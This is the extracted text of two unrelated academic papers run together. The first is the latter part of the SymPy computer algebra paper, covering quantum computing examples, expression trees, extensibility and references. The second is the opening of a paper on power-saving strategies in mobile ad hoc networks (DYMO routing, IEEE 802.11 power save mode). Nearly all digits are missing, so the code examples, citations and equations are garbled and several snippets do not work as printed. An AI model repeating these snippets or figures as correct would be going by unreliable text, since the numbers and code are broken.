oscillator states and raising/lowering operators, infinite square well states, and d position and momentum operators and states. • second quantized formalism of non-relativistic many-body quantum mechanics (fetter & walecka, ). • quantum angular momentum (zare, ). spin operators and their eigenstates can be represented in any basis and for any quantum numbers. a rotation operator representing the wigner d-matrix, which may be defined symbolically or numerically, is also implemented to rotate spin eigenstates. functionality for coupling and uncoupling of arbitrary spin eigenstates is provided, including symbolic representations of clebsch- gordon coefficients and wigner symbols. • quantum information and computing (nielsen & chuang, ). multidimensional qubit states, and a full set of one- and two-qubit gates are provided and can be represented symbolically or as matrices/vectors. with these building blocks, it is possible to implement a number of basic quantum algorithms including the quantum fourier transform, quantum error correction, quantum teleportation, grover’s algorithm, dense coding, etc. in addition, any quantum circuit may be plotted using the circuit_plot function (fig. ). here are a few short examples of the quantum information and computing capabilities in sympy.physics.quantum . start with a simple four-qubit state and flip the second qubit from the right using a pauli-x gate: >>> from sympy.physics.quantum.qubit import qubit >>> from sympy.physics.quantum.gate import xgate >>> q = qubit(' ') >>> q | > >>> x = xgate( ) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. h s t h s h figure the circuit diagram for a three-qubit quantum fourier transform generated by sympy. >>> qapply(x*q) | > qubit states can also be used in adjoint operations, tensor products, inner/outer products: >>> dagger(q) < | >>> ip = dagger(q)*q >>> ip < | > >>> ip.doit() quantum gates (unitary operators) can be applied to transform these states and then classical measurements can be performed on the results: >>> from sympy.physics.quantum.qubit import measure_all >>> from sympy.physics.quantum.gate import h, x, y, z >>> c = h( )*h( )*qubit(' ') >>> c h( )*h( )*| > >>> q = qapply(c) >>> measure_all(q) [(| >, / ), (| >, / ), (| >, / ), (| >, / )] lastly, the following example demonstrates creating a three-qubit quantum fourier transform, decomposing it into one- and two-qubit gates, and then generating a circuit plot for the sequence of gates (see fig. ). >>> from sympy.physics.quantum.qft import qft >>> from sympy.physics.quantum.circuitplot import circuit_plot >>> fourier = qft( , ).decompose() >>> fourier swap( , )*h( )*c(( ),s( ))*h( )*c(( ),t( ))*c(( ),s( ))*h( ) >>> c = circuit_plot(fourier, nqubits= ) meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. some internal classes, such as those used in the polynomial submodule, do not follow this rule for efficiency reasons. architecture software architecture is of central importance in any large software project because it establishes predictable patterns of usage and development (shaw & garlan, ). this section describes the essential structural components of sympy, provides justifications for the design decisions that have been made, and gives example user-facing code as appropriate. the core a computer algebra system stores mathematical expressions as data structures. for example, the mathematical expression x+y is represented as a tree with three nodes, +, x, and y, where x and y are ordered children of +. as users manipulate mathematical expressions with traditional mathematical syntax, the cas manipulates the underlying data structures. symbolic computations such as integration, simplification, etc. are all functions that consume and produce expression trees. in sympy every symbolic expression is an instance of the class basic, the superclass of all sympy types providing common methods to all sympy tree-elements, such as traversals. the children of a node in the tree are held in the args attribute. a leaf node in the expression tree has empty args. for example, consider the expression xy+ : >>> x, y = symbols('x y') >>> expr = x*y + by order of operations, the parent of the expression tree for expr is an addition. it is of type add. the child nodes of expr are and x*y. >>> type(expr) <class 'sympy.core.add.add'> >>> expr.args ( , x*y) descending further down into the expression tree yields the full expression. for example, the next child node (given by expr.args[ ]) is . its class is integer, and it has an empty args tuple, indicating that it is a leaf node. >>> expr.args[ ] >>> type(expr.args[ ]) <class 'sympy.core.numbers.integer'> >>> expr.args[ ].args () symbols or symbolic constants, like e or π, are other examples of leaf nodes. >>> exp( ) e >>> exp( ).args meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the dotprint function from the sympy.printing.dot submodule prints output to dot format, which can be rendered with graphviz to visualize expression trees graphically. expr.func is used instead of type(expr) to allow the function of an expression to be distinct from its actual python class. in most cases the two are the same. () >>> x.args () a useful way to view an expression tree is using the srepr function, which returns a string representation of an expression as valid python code with all the nested class constructor calls to create the given expression. >>> srepr(expr) "add(mul(symbol('x'), symbol('y')), integer( ))" every sympy expression satisfies a key identity invariant: expr.func(*expr.args) == expr this means that expressions are rebuildable from their args. note that in sympy the == operator represents exact structural equality, not mathematical equality. this allows testing if any two expressions are equal to one another as expression trees. for example, even though (x+ ) and x + x+ are equal mathematically, sympy gives >>> (x + )** == x** + *x + false because they are different as expression trees (the former is a pow object and the latter is an add object). another important property of sympy expressions is that they are immutable. this simplifies the design of sympy, and enables expression interning. it also enables expressions to be hashed, which allows expressions to be used as keys in python dictionaries, and is used to implement caching in sympy. python allows classes to override mathematical operators. the python interpreter translates the above x*y + to, roughly, (x.__mul__(y)).__add__( ) . both x and y, returned from the symbols function, are symbol instances. the in the expression is processed by python as a literal, and is stored as python’s built in int type. when is passed to the __add__ method of symbol, it is converted to the sympy type integer( ) before being stored in the resulting expression tree. in this way, sympy expressions can be built in the natural way using python operators and numeric literals. extensibility while the core of sympy is relatively small, it has been extended to a wide variety of domains by a broad range of contributors. this is due, in part, to the fact that the same language, python, is used both for the internal implementation and the external usage by users. all of the extensibility capabilities available to users are also utilized by sympy itself. this eases the transition pathway from sympy user to sympy developer. the typical way to create a custom sympy object is to subclass an existing sympy class, usually basic, expr, or function. as it was stated before, all sympy classes used for expression trees should be subclasses of the base class basic. expr is the basic subclass for mathematical objects that can be added and multiplied together. the most commonly seen classes in sympy are subclasses of expr, including add, mul, and symbol. instances of meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. see section s for more information on the sympy.logic submodule. expr typically represent complex numbers, but may also include other ‘‘rings’’, like matrix expressions. not all sympy classes are subclasses of expr. for instance, logic expressions, such as and(x, y) , are subclasses of basic but not of expr. the function class is a subclass of expr which makes it easier to define mathematical functions called with arguments. this includes named functions like sin(x) and log(x) as well as undefined functions like f (x). subclasses of function should define a class method eval, which returns an evaluated value for the function application (usually an instance of some other class, e.g., a number), or none if for the given arguments it should not be automatically evaluated. many sympy functions perform various evaluations down the expression tree. classes define their behavior in such functions by defining a relevant _eval_ * method. for instance, an object can indicate to the diff function how to take the derivative of itself by defining the _eval_derivative(self, x) method, which may in turn call diff on its args. (subclasses of function should implement the fdiff method instead; it returns the derivative of the function without considering the chain rule.) the most common _eval_ * methods relate to the assumptions: _eval_is_ assumption is used to deduce assumption on the object. listing presents an example of this extensibility. it gives a stripped down version of the gamma function (x) from sympy. the methods defined allow it to evaluate itself on positive integer arguments, define the real assumption, allow it to be rewritten in terms of factorial (with gamma(x).rewrite(factorial) ), and allow it to be differentiated. self.func is used throughout instead of referencing gamma explicitly so that potential subclasses of gamma can reuse the methods. listing : a minimal implementation of sympy.gamma. from sympy import function , integer , factorial , polygamma class gamma(function ): @classmethod def eval(cls , arg): if isinstance(arg , integer) and arg.is_positive: return factorial(arg - ) def _eval_is_real(self): x = self.args [ ] # noninteger means real and not integer if x.is_positive or x.is_noninteger: return true def _eval_rewrite_as_factorial(self , z): return factorial(z - ) def fdiff(self , argindex = ): from sympy.core.function import argumentindexerror if argindex == : return self.func(self.args [ ])* polygamma( , self.args [ ]) else: raise argumentindexerror(self , argindex) the gamma function implemented in sympy has many more capabilities than the above listing, such as evaluation at rational points and series expansion. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- https://peerj.com http://dx.doi.org/ . /peerj-cs. performance due to being written in pure python without the use of extension modules, sympy’s performance characteristics are generally poorer than that of its commercial competitors. for many applications, the performance of sympy, as measured by clock cycles, memory usage, and memory layout, is sufficient. however, the boundaries for when sympy’s pure python strategy becomes insufficient are when the user requires handling of very long expressions or many small expressions. where this boundray lies depends on the system at hand, but tends to be within the range of – symbols for modern computers. for this reason, a new project called symengine (the sympy developers, a) has been started. the aim of this poject is to develop a library with better performance characteristics for symbolic manipulation. symengine is a pure c++ library, which allows it fine-grained control over the memory layout of expressions. symengine has thin wrappers to other languages (python, ruby, julia, etc.). its aim is to be the fastest symbolic manipulation library. preliminary benchmarks suggest that symengine performs as well as its commercial and open source competitors. the development version of sympy has recently started to use symengine as an optional backend, initially in sympy.physics.mechanics only. future work will involve allowing more algorithms in sympy to use symengine as a backend. projects that depend on sympy there are several projects that depend on sympy as a library for implementing a part of their functionality. a selection of these projects are listed in table . conclusion and future work sympy is a robust computer algebra system that provides a wide spectrum of features both in traditional computer algebra and in a plethora of scientific disciplines. it can be used in a first-class way with other python projects, including the scientific python stack. sympy supports a wide array of mathematical facilities. these include functions for assuming and deducing common mathematical facts, simplifying expressions, performing common calculus operations, manipulating polynomials, pretty printing expressions, solving equations, and representing symbolic matrices. other supported facilities include discrete math, concrete math, plotting, geometry, statistics, sets, series, vectors, combinatorics, group theory, code generation, tensors, lie algebras, cryptography, and special functions. sympy has strong support for arbitrary precision numerics, backed by the mpmath package. additionally, sympy contains submodules targeting certain specific physics domains, such as classical mechanics and quantum mechanics. this breadth of domains has been engendered by a strong and vibrant user community. anecdotally, many of these users chose sympy because of its ease of access. sympy is a dependency of many external projects across a wide spectrum of domains. sympy expressions are immutable trees of python objects. unlike many other cas’s, sympy is designed to be used in an extensible way: both as an end-user application and as a library. sympy uses python both as the internal language and the user language. this meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected projects that depend on sympy. project name description sympy gamma an open source analog of wolfram |alpha that uses sympy (the sympy developers, b). there is more information about sympy gamma in section s . cadabra a cas designed specifically for the resolution of problems encountered in field theory (peeters, ). gnu octave symbolic package an implementation of a symbolic toolbox for octave using sympy (the symbolic package developers, ). sympy.jl a julia interface to sympy, provided using pycall (the sympy.jl developers, ). mathics a free, online cas featuring mathematica compatible syntax and functions (the mathics developers, ). mathpix an ios app that detects handwritten math as input and uses sympy gamma to evaluate the math input and generate the relevant steps to solve the problem (mathpix, inc., ). ikfast a robot kinematics compiler provided by openrave (diankov, ). sagemath a free open-source mathematics software system, which builds on top of many existing open-source packages, including sympy (the sage developers, ). pydy multibody dynamics with python (gede et al., ). galgebra a python package for geometric algebra (previously sympy.galgebra) (bromborsky, ). yt a python package for analyzing and visualizing volumetric data (turk et al., ). sfepy a python package for solving partial differential equations (pdes) in d, d, and d by the finite element (fe) method (zienkiewicz, taylor & zhu, ; cimrman, ). quameon quantum monte carlo in python (the quameon developers, ). lcapy an experimental python package for teaching linear circuit analysis (the lcapy developers, ). permits users to access the same methods used by the library itself in order to extend it for their needs. some of the planned future work for sympy includes work on improving code generation, improvements to the speed of sympy using symengine, improving the assumptions system, and improving the solvers submodule. additional information and declarations funding google summer of code provided financial support to students who contributed to sympy. ondřej Čertík was supported by the los alamos national laboratory. the los alamos national laboratory is operated by los alamos national security, llc, for the national nuclear security administration of the us department of energy under contract no. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sympygamma.com/ http://dx.doi.org/ . /peerj-cs. /supp- http://cadabra.science/index.html https://github.com/cbm /octsympy https://github.com/jverzani/sympy.jl https://mathics.github.io/ http://mathpix.com/ http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://openrave.org/ http://www.sagemath.org/ http://www.pydy.org/ https://github.com/brombo/galgebra http://yt-project.org/ http://sfepy.org/ http://quameon.sourceforge.net/ http://lcapy.elec.canterbury.ac.nz/ http://dx.doi.org/ . /peerj-cs. de-ac - na . richard p. muller was supported by sandia national laboratories. sandia national laboratories is a multi-program laboratory managed and operated by sandia corporation, a wholly owned subsidiary of lockheed martin corporation, for the u.s. department of energy’s national nuclear security administration under contract de- ac - al . francesco bonazzi was supported by deutsche forschungsgemeinschaft (dfg) via the international research training group ‘‘self- assembled soft matter nano-structures at interfaces.’’ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: google summer of code. los alamos national laboratory: no. de-ac - na . sandia national laboratories: de-ac - al . international research training group . competing interests christopher p. smith is an employee of polar semiconductor, inc., bloomington, minnesota, united states; mateusz paprocki and matthew rocklin are employees of continuum analytics, inc., austin, texas, united states; andy r. terrel is an employee of fashion metric, inc, austin, texas, united states. author contributions • aaron meurer, christopher p. smith, mateusz paprocki, ondřej Čertík, sergey b. kirpichev, matthew rocklin, amit kumar, sergiu ivanov, jason k. moore, sartaj singh, thilina rathnayake, sean vig, brian e. granger, richard p. muller, francesco bonazzi, harsh gupta, shivam vats, fredrik johansson, fabian pedregosa, matthew j. curry, andy r. terrel, Štěpán roučka, ashutosh saboo, isuru fernando, sumith kulal, robert cimrman and anthony scopatz wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the source for the paper is at https://github.com/sympy/sympy-paper. the source code for sympy is at https://github.com/sympy/sympy. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adams ww, loustaunau p. . an introduction to gröbner bases. vol. . boston: american mathematical society. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sympy/sympy-paper https://github.com/sympy/sympy http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. bailey dh, jeyabalan k, li xs. . a comparison of three high-precision quadrature schemes. experimental mathematics ( ): – . bender cm, orszag sa. . advanced mathematical methods for scientists and engineers. st edition. berlin heidelberg: springer. biggs n, lloyd ek, wilson rj. . graph theory, – . oxford: oxford university press. bromborsky a. . geometric algebra/calculus modules for sympy galgebra. available at https://github.com/brombo/galgebra. bronstein m. a. pmint—the poor man’s integrator. available at http://www- sop.inria.fr/cafe/manuel.bronstein/pmint. bronstein m. b. symbolic integration i: transcendental functions. new york: springer–verlag. buchberger b. . ein algorithmus zum auffinden der basis elemente des restk- lassenrings nach einem nulldimensionalen polynomideal. phd thesis, university of innsbruck, innsbruck, austria. cervone d. . mathjax: a platform for mathematics on the web. notices of the ams ( ): – . cimrman r. . sfepy—write your own fe application. proceedings of the th european conference on python in science (euroscipy ). – . available at http://arxiv.org/abs/ . . ciurana e. . google app engine. in: developing with google app engine. firstpress (en ligne), berkeley: apress. diankov r. . ikfast: the robot kinematics compiler. available at http://openrave.org/ docs/latest_stable/openravepy/ikfast/ . doorenbos rb. . production matching for large learning systems. phd thesis, university of southern california. faugère jc. . a new efficient algorithm for computing gröbner bases (f ). journal of pure and applied algebra ( – ): – . faugère jc. . a new efficient algorithm for computing gröbner bases without reduction to zero (f ). in: issac’ : proceedings of the international symposium on symbolic and algebraic computation. new york: acm press – .. fetter a, walecka j. . quantum theory of many-particle systems. mineola: dover publications. fousse l, hanrot g, lefèvre v, pélissier p, zimmermann p. . mpfr: a multiple- precision binary floating-point library with correct rounding. acm transactions on mathematical software ( ): doi . / . . fu h, zhong x, zeng z. . automated and readable simplification of trigonomet- ric expressions. mathematical and computer modelling ( – ): – doi . /j.mcm. . . . gede g, peterson dl, nanjangud as, moore jk, hubbard m. . constrained multi- body dynamics with python: from symbolic equation generation to publication. in: asme international design engineering technical conferences and computers and meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/brombo/galgebra http://www-sop.inria.fr/cafe/manuel.bronstein/pmint http://www-sop.inria.fr/cafe/manuel.bronstein/pmint http://arxiv.org/abs/ . http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://openrave.org/docs/latest_stable/openravepy/ikfast/ http://dx.doi.org/ . / . http://dx.doi.org/ . /j.mcm. . . http://dx.doi.org/ . /peerj-cs. information in engineering conference, new york: american society of mechanical engineers, v bt a –v bt a . goldberg d. . what every computer scientist should know about floating-point arithmetic. acm computing surveys (csur) ( ): – . gosper rw. . decision procedure for indefinite hypergeometric summation. proceedings of the national academy of sciences of the united states of america ( ): – . gruntz d. . on computing limits in a symbolic manipulation system. phd thesis, swiss federal institute of technology, zürich, switzerland. horsen cv. . gmpy. available at https://pypi.python.org/pypi/gmpy . hudak p. . domain specific languages. in: salas ph, ed. handbook of programming languages, vol. iii: little languages and tools, chapter . indianapolis: macmillan, – . hunter jd. . matplotlib: a d graphics environment. computing in science & engineering ( ): – . johansson f, the mpmath development team. . mpmath: a python library for arbitrary-precision floating-point arithmetic. version . . available at http: //mpmath.org/ . jones e, oliphant t, peterson p, the scipy development team. . scipy: open source scientific tools for python. available at http://www.scipy.org/ (accessed on september ). kane tr, levinson da. . dynamics, theory and applications. new york: mcgraw hill. kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kelley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c, the jupyter development team. . jupyter notebooks—a publishing format for reproducible computational workflows. in: positioning and power in academic publishing: players, agents and agendas: proceedings of the th international conference on electronic publishing. amsterdam: ios press, . lagrange j. . mécanique analytique. no. v. . paris: ve courcier. lang s. . introduction to transcendental numbers. in: addison-wesley series in mathematics. reading: addison-wesley pub. co. lutz m. . learning python. sebastopol: o’reilly media, inc. mathpix, inc. . mathpix — solve and graph math using pictures. available at http://mathpix.com/ . moses j. . algebraic simplification: a guide for the perplexed. in: symsac’ : proceedings of the second acm symposium on symbolic and algebraic computation. new york: acm press, – doi . / . . nielsen m, chuang i. . quantum computation and quantum information. new york: cambridge university press. nijenhuis a, wilf hs. . combinatorial algorithms: for computers and calculators. second edition. new york: academic press. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://pypi.python.org/pypi/gmpy http://mpmath.org/ http://mpmath.org/ http://www.scipy.org/ http://mathpix.com/ http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. oliphant te. . python for scientific computing. computing in science & engineering ( ): – . paprocki m. . design and implementation issues of a computer algebra system in an interpreted, dynamically typed programming language. master’s thesis, university of technology of wrocław, poland. peeters k. . cadabra: a field-theory motivated symbolic computer algebra system. computer physics communications ( ): – . pérez f, granger be. . ipython: a system for interactive scientific computing. computing in science & engineering ( ): – . peterson dl, gede g, hubbard m. . symbolic linearization of equations of motion of constrained multibody systems. multibody system dynamics ( ): – doi . /s - - - . petkovšek m, wilf hs, zeilberger d. . a = b. wellesley: ak peters, ltd., +.available at http://www.math.rutgers.edu/~zeilberg/aeqb.pdf . raymond e. . the cathedral and the bazaar. knowledge, technology & policy ( ): – . roach k. . hypergeometric function representations. in: issac’ : proceedings of the international symposium on symbolic and algebraic computation. new york: acm press – .. roach k. . in: issac’ : proceedings of the international symposium on symbolic and algebraic computation. new york: acm, – doi . / . - - - . rocklin m. . mathematically informed linear algebra codes through term rewriting. phd thesis, university of chicago. rocklin m, terrel ar. . symbolic statistics with sympy. computing in science and engineering ( ): – doi . /mcse. . . rose kh. . xy-pic user’s guide. available at http://ctan.org/tex-archive/macros/ generic/diagrams/xypic/doc/xyguide.pdf . rosen l. . open source licensing: software freedom and intellectual property law. upper saddle river: prentice hall. sakurai j, napolitano j. . modern quantum mechanics. boston: addison-wesley. shaw m, garlan d. . software architecture: perspectives on an emerging discipline. pittsburgh: prentice hall. sussman gj, wisdom j. . functional differential geometry. cambridge: mas- sachusetts institute of technology press. tai c-t. . generalized vector and dyadic analysis: applied mathematics in field theory. vol. . hoboken: wiley-ieee press. takahasi h, mori m. . double exponential formulas for numerical integration. publications of the research institute for mathematical sciences ( ): – . the lcapy developers. . lcapy, a python package for linear circuit analysis. available at http://lcapy.elec.canterbury.ac.nz/ . meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://www.math.rutgers.edu/~zeilberg/aeqb.pdf http://dx.doi.org/ . / . - - - http://dx.doi.org/ . /mcse. . http://ctan.org/tex-archive/macros/generic/diagrams/xypic/doc/xyguide.pdf http://ctan.org/tex-archive/macros/generic/diagrams/xypic/doc/xyguide.pdf http://lcapy.elec.canterbury.ac.nz/ http://dx.doi.org/ . /peerj-cs. the mathics developers. . mathics, a free, general-purpose online computer algebra system featuring mathematica-compatible syntax and functions. available at https://mathics.github.io/ . the quameon developers. . quameon, quantum monte carlo in python. available at http://quameon.sourceforge.net/ . the sage developers. . sagemath, the sage mathematics software system. available at http://www.sagemath.org. the symbolic package developers. . the symbolic package for gnu octave. available at http://octave.sourceforge.net/symbolic. the sympy developers. a. symengine, a fast symbolic manipulation library, written in c++. available at https://github.com/symengine/symengine. the sympy developers. b. sympy gamma. available at http://www.sympygamma. com/ . the sympy.jl developers. . sympy.jl, a package to bring python’s sympy function- ality into julia via pycall. available at https://github.com/juliapy/sympy.jl. toth vt. . maple and meijer’s g-function: a numerical instability and a cure. available at http://www.vttoth.com/cms/index.php/technical-notes/ . turk mj, smith bd, oishi js, skory s, skillman sw, abel t, norman ml. . yt: a multi-code analysis toolkit for astrophysical simulation data. the astrophysical journal supplement series : doi . / - / / / . zare r. . angular momentum: understanding spatial aspects in chemistry and physics. hoboken: wiley. zienkiewicz o, taylor r, zhu j. . the finite element method: its basis and funda- mentals. seventh edition. oxford: butterworth-heinemann. meurer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://mathics.github.io/ http://quameon.sourceforge.net/ http://www.sagemath.org http://octave.sourceforge.net/symbolic https://github.com/symengine/symengine http://www.sympygamma.com/ http://www.sympygamma.com/ https://github.com/juliapy/sympy.jl http://www.vttoth.com/cms/index.php/technical-notes/ http://dx.doi.org/ . / - / / / http://dx.doi.org/ . /peerj-cs. submitted june accepted september published november corresponding authors lubna naaz fatima, lubnanaaz @gmail.com fahmina taranum, ftaranum@yahoo.com, ftaranum@mjcollege.ac.in academic editor daniele d’agostino additional information and declarations can be found on page doi . /peerj-cs. copyright fatima et al. distributed under creative commons cc-by . open access efficient strategies to reduce power consumption in manets lubna naaz fatima*, syeda hajra mahin and fahmina taranum* computer science and engineering, muffakham jah college of engineering and technology, hyderabad, telangana, india * these authors contributed equally to this work. abstract in current circumstances, where amelioration in technology is elevating, power optimization is of grave concern, whilst perceiving portable conditions. the focus is to design an efficient system with an aim to reduce power consumption and improve performance of other metrics. heterogeneous wireless systems will command in the next-generation wireless networks with the aggregation of different remote access mechanisms. a node in manet (mobile adhoc networks) while consuming significant amount of energy practices data transmission and data retrieval process whilst bonding with other neighboring nodes that are within its range. the proposed work implements user specified energy model and dymo (dynamic manet on- demand) routing protocol. further, additional features of ieee . i.e., power saving mode is employed. to obtain enhanced coverage at targeted areas, multi-hop relay strategy is taken into account, also to achieve a less power consuming network with a greater service life. consequently, the efficiency of the devices is monitored by opting residual life accurate battery model, by using different datasets of duracell aa and aaa batteries. simultaneously, battery model, energy model and dymo (dynamic manet on-demand) are applied for ieee . to get a comparative assessment of power consumption between ieee . and ieee . . results are generated for both the architectures i.e., . and . for metrics such as residual amount of energy for varying simulation time for all the nodes and for energy consumption in aodv (ad hoc on-demand distance vector) and dymo (dynamic manet on- demand) routing protocol using qualnet version . . subjects computer networks and communications, mobile and ubiquitous computing keywords dymo, aodv, ieee . , ieee . , dcf, ps, dtim introduction networking is a realm with brisk improvement in diverged categories, in which a category that requires immense importance is constrained battery life, which is a grave concern for the users and researchers. constraining the utilization of battery, in union with enhancing its system execution and features in the battery exploitation, while upgrading the system execution and enhancing the features in the mobile station (ms), is a considerable challenge. since a wireless device functioning is based on battery, the issues regarding conservation of energy has to be considered and the constrained battery charge will force the node to route just a limited number of bits. the maximum numbers of bits that can how to cite this article fatima ln, mahin sh, taranum f. . efficient strategies to reduce power consumption in manets. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:lubnanaaz @gmail.com mailto:ftaranum@yahoo.com mailto:ftaranum@mjcollege.ac.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. be delivered are considered by dividing the total energy with energy utilized per bit. hence power conserving techniques that alleviate the battery life is needed. major issues with ad-hoc mode is the constrained battery and restricted data transmission bandwidth. thereupon, the considerate part of the ad-hoc systems has the algorithm centric implementation along with deduction for energy depleted per bit during transmission based on transmission strategies to deduce overhead control and alleviate the performance of bandwidth consumption. dymo routing protocol the dynamic manet on demand (dymo) routing protocol inherits some of the characteristics of ad hoc on-demand distance vector (aodv) routing protocol. captivating and unveiling a significant number of its benefits, it is simpler to execute and is outlined bearing future advancements in mind. dymo functions as a reactive routing protocol, i.e., paths to the destination can be retrieved specifically when demanded. dymo performs two main operations: ( ) route discovery and ( ) route maintenance. route discovery is done with help of rreq (route request) and rrep (route reply) messages whereas route maintenance is done using rerr (route error) message (didawiki, ). the route request (rreq) messages are aired by the source node (anuj, sadawarti & anil, ). each rreq maintains a report that captures the data of the nodes which it has gone through. the report hold details about every node and the process the nodes follow while it receives an rreq message, and an instant evaluation is computed to route back to the original point of message. at the moment where an rreq message catches up with its goal node, a route reply (rrep) (anuj, sadawarti & anil, ) message will be delivered back to the starting point, which gives a confirmation that a route to the goal node was found. on its way back to the source, an rrep message can conveniently trace back the path on which the rreq message was forwarded along with nodes it went through, to record two-sided path information, back to where it was originated from. the benefits of dymo (dynamic manet on demand) over aodv (ad hoc on- demand distance vector) are • if intermediate node has already an entry for destination in its routing table, it replies with route reply (rrep) message to source in response to route request (rreq) message • life time of a route is extended upon successful forwarding of a packet via that route. • when a route to a destination is lost then a route error (rerr) message is sent towards the source node and also rerr is multi casted to other nodes that were associated to unreachable node. upon receiving message, the source node deletes the route from its routing table. if the source node has another packet to forward for the same destination node, it will again initiate a route discovery process. • the routing table of dymo is comparatively less memory consuming than aodv • the overhead for the protocol decreases with increased network sizes and high mobility, and energy efficiency increases. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ieee . ieee . was envisaged for a broad-range high-transmission remote access, also known as wireless metropolitan area network (wireless man) or worldwide interoperability for microwave access (wimax). the data transmission rate can reach up to mbps and signal spectrum can go as much as -kilometres ( miles) (thontadharya et al., ). ieee . e provides mobility support to ieee . . ieee . it is commercially known as the wireless local area network (wlan). typically, two distinct structures, bss (basic service set or infrastructure mode) and ibss (independent basic service set) or ad-hoc mode has been characterized by ieee . . in a bss, mobile stations (stas) are connected to an ap (access point) which is accountable for administering all the interactions that take place among the stations. stations then reach to one and another in a straightforward fashion. in ieee . , the power saving mode (psm) is stationed on deducing the power utilization of the mobile device to point that lacks activity. qualnet, ieee . mac features two diverse access components (moustafa, vasan & raymond, ), the obligatory dcf (distributed co-ordination function), and the optional pcf (point co-ordination function). distributed coordination function (dcf) distributed coordination function (dcf) provides distributed channel access hinging on csma/ca (carrier sense multiple access with collision avoidance) (moustafa, vasan & raymond, ; comlab, ). in dcf, a station observes the channel’s state for a difs (dcf inter frame space) period prior to accessing the wireless medium, in order to forward the data. in a rare event the wireless medium is discovered busy amid the difs interim, the station will then delay its transmission. in the network where various stations struggle to achieve the remote medium, if numerous stations sense the channel to be occupied, they delay their progress. and when it is discovered that the channel is released then an attempt to capture the channel is made by the stations in urge to perform the data forwarding operation, which leads to collision. to prevent such effects dcf additionally specifies random back-off time, which forces a station to delay its attempt to access the wireless medium for an additional period. if the medium for difs length is found to be idle, then an authorized access to the medium can be gained and the transmission will commence for the data. difs span can be determined by the following equation, dcf inter-frame space (difs) = short inter-frame space (sifs)+ ( * slot time) short inter-frame space (sifs) is the measure of time in microseconds required for a remote interface to process a received frame and to react with a response frame (tripathy, ; moustafa, vasan & raymond, ; comlab, ). network allocation vector ieee . provides network allocation vector (nav) (comlab, ) that is utilized inside dcf/pcf which is intended to supervise the access to wireless medium by the stations, so that contention generated by the stations can be prevented. each station in the fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. system holds a nav indicator, which notifies the station about the status of the wireless medium. if nav is set as bit ’ ’, the transmission won’t be initiated by the station, despite the fact that the medium is relieved from traffic. power saving mode the ieee . standard adopted the power save mode (psm) (chen, xie & wang, ) / ps mode to reduce energy utilization at stations (sta’s). as indicated by the ieee . standard during the ps mode, a node remains in either of the two states, i.e., in active state, or sleep state. in the active state, the node performs information exchange. in the sleep state, on the differentiation, the station is turned off and thus, it cannot detect the network operations. the remote interface is in alert state for most of the listening period, and power utilization in this state is a bit excess when compared to the rest state. in rest mode, the access point (ap) stocks up the approaching frames, destined for a particular mobile station in psm and intermittently declares its buffering status through the traffic indication map (tim) (tripathy, ) which is encapsulated in the beacon frames and this information is forwarded to all the nodes in psm by means of a unicast, broadcast, or a multicast. beacon frame (chen, xie & wang, ), a management frame in ieee . , is aired out by the controller, which carries thorough information about the network. they are transmitted intermittently by the access point and serve to synchronize the transmission of the data among the nodes. the mobile station in psm will awake periodically to listen to the beacon frames. when the in partial virtual bitmap field of tim matches to its association id (aid), the mobile station sends a ps-poll frame (comlab, ) to the ap to fetch the data and the ap acknowledges to each poll with a buffered frame. numerous exchanges of ps-polls occur between mobile stations and ap, until every single frame has been redeemed by the mobile station. in the broadcast or multicast case, the presence of buffered frames at access point is revealed by setting bit map control and partial virtual bitmap field in the tim (traffic indication map), dtim (delivery traffic indication map) is a unique tim conveyed at a fixed number of beacon interims (tripathy, ). the access point wakes up the mobile stations for it to collect the data cached for it. the less the value of dtim period is, the more consistently a node wakes up and the more battery it utilizes. by parameterizing, a low dtim and beacon interval help the nodes to be conscious and serve for a longer period of time. rather than the ordinary continuous active mode (cam), a remote station in psm can frequently put off its system interface to preserve energy when it has no further data buffered at the ap. figure demonstrates the overall mechanism of power saving mode and also gives a review on how dtim work in intervals. fatima et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure power saving mode. the overall mechanism of power saving mode considering two mobile stations and an access point. full-size doi: . /peerjcs. /fig- energy model a radio energy model evaluates the energy consumed in the hardware, specifically during the state that has been exhibited by the devices which can be transmit, receive, idle, and 